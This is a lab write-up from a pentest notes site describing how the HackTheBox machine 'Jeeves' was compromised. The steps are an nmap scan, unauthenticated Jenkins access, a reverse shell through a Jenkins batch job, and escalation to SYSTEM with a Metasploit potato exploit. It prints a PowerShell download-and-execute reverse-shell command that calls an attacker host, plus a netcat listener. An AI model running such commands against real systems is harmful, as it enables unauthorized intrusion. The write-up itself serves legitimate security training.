Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Nmap
  • Port 80
  • Port 50000
  • Privilege Escalation

Was this helpful?

  1. Writeups
  2. HackTheBox
  3. Windows

Jeeves

https://www.hackthebox.eu/home/machines/profile/114

Nmap

I Started off scanning all ports and then a done a more intense scan on the ports found as per below:

nmap 10.10.10.63 -p- 

PORT      STATE SERVICE
80/tcp    open  http                                                                                                                                                          
135/tcp   open  msrpc                                                                                                                                                         
445/tcp   open  microsoft-ds                                                                                                                                                  
50000/tcp open  ibm-db2                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                             
nmap 10.10.10.63 -p 80,135,445,50000 -A -T4
                                                                                                                                                                                                                                           
PORT      STATE SERVICE      VERSION                                                                                                                                                                                                       
80/tcp    open  http         Microsoft IIS httpd 10.0                                                                                                                                                                                      
| http-methods:                                                                                                                                                                                                                            
|_  Potentially risky methods: TRACE                                                                                                                                                                                                       
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                                                                   
|_http-title: Ask Jeeves                                                                                                                                                                                                                   
135/tcp   open  msrpc        Microsoft Windows RPC                                                                                                                                                                                         
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)                                                                                                                                                  
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h00m20s, deviation: 0s, median: 5h00m19s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-02T00:35:20
|_  start_date: 2020-10-01T00:50:42

I first tried enum4linux on SMB and did not get any valid hits for null session. I next moved onto port 80 whilst kicking off gobuster and nikto on port 80 and port 50000 since it has been reported as HTTP

Port 80

Port 80 directs us over to a AskJeeves web page.

Entering a value into the field and searching produces a error page which on further inspection appears to be an image. Searching using potential SQL injections or any other search parameter produces the same result.

When viewing page source we get the following:

Selecting "jeeves.PNG" takes us to the above image. Based on this I will not be spending anymore time on port 80 as we have still not inspected port 50000.

Port 50000

Heading over to Port 50000 we land on the following page:

Clicking on the link takes us away to https://eclipse.org/jetty/

gobuster reveals a directory of /askjeeves/ on this port.

Looks like we have unauthenticated access to Jenkins. As we have freedom of Jenkins we can select the "create new jobs" link. From here give the project a name and select "freestyle project".

On the next screen head down to "Build" and then select "Execute Windows batch command".

On this next part we are going to use nishang Invoke-PowershellTcp to get a reverse shell on the machine.

run the following with root permissions to install nishang

sudo apt-get install nishang

After install we can find the nishang files at /usr/share/nishang/shells Start a python server in the shells directory as we will need to pull one of the files to gain shell.

Set up a netcat listener. In this example I will be using port 443.

sudo nc -lvp 80

We can now insert the following command into the Jenkins batch command box. Changing IP and port where appropriate.

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

After you have completed this save the project at the bottom of the screen and then on the following screen select "Build now"

You should notice the python server receives a GET request for the file specified with a HTTP code 200. If you have incorrectly spelt the file you will receive a code 404.

netcat should now pick up the shell and get you on the system as a low privilege account.

From here we can grab the user.txt flag before moving onto privilege escalation.

Privilege Escalation

For privilege escalation we should start with the normal system enumeration. We can run system info and run this against Windows_exploit_suggester.py.

I have covered Windows_exploit_suggester usage here if you need to know how to use it:

After going through the results of the python script what sticks out to us is the following exploit:

FoxGlove Security have done a fantastic write up on the exploit which can be read here.

We can run the command whoami /priv and see if we have any of the correct privileges to perform the exploit. the privilege SeImpersonatePrivilege will allow us to run the exploit for MS16-075. This privilege is usually given to service accounts.

We will be using metasploit for the escalation and as such we will need to upgrade our shell to a meterpreter shell. Open msfconsole and search for multi/script/web_delivery set the correct options.

Run the module and it should create some Powershell code which needs to be run on the victim machine. The web_delivery module will keep a listener open waiting for when the code is run. When we execute the code on the victim machine this should give us a meterpreter shell back (depend on the payload you selected).

After running we should receive a shell back in msfconsole.

We can now run a search for the exploit in msfconsole after back grounding our meterpreter session.

Select options 1 for the juicy exploit and set the payload options. When you have filled out the correct information run the exploit and you should land a shell as system.

From here we should be able to grab root.txt?

Or not... Looks like we will have to look elsewhere.

After some time and looking literally everywhere I could not find the root flag. I eventually turned to the HTB forums for hints and eventually came to the right answer with the command Dir /R this command allows you to view alternative datastream (ADS) files.

After retrieving root I did a little research on finding ADS files as I do not believe I would have found this without a hint. Malwarebytes have done a great blog post on the subject and have provided some good methods for over coming this.

Last updated 2 years ago

Was this helpful?

🚩
GitBook
Rotten Potato – Privilege Escalation from Service Accounts to SYSTEMfoxglovesec
Introduction to Alternate Data StreamsMalwarebytes Labs
Logo
Logo
Logo
Kicking off multiple scans on port 80 and 50000
Port 80
Port 50000
/askjeeves/
low privilege shell.
Generating the payload.
Running the payload on the victim machine
meterpreter shell
NT Authority\System
root flag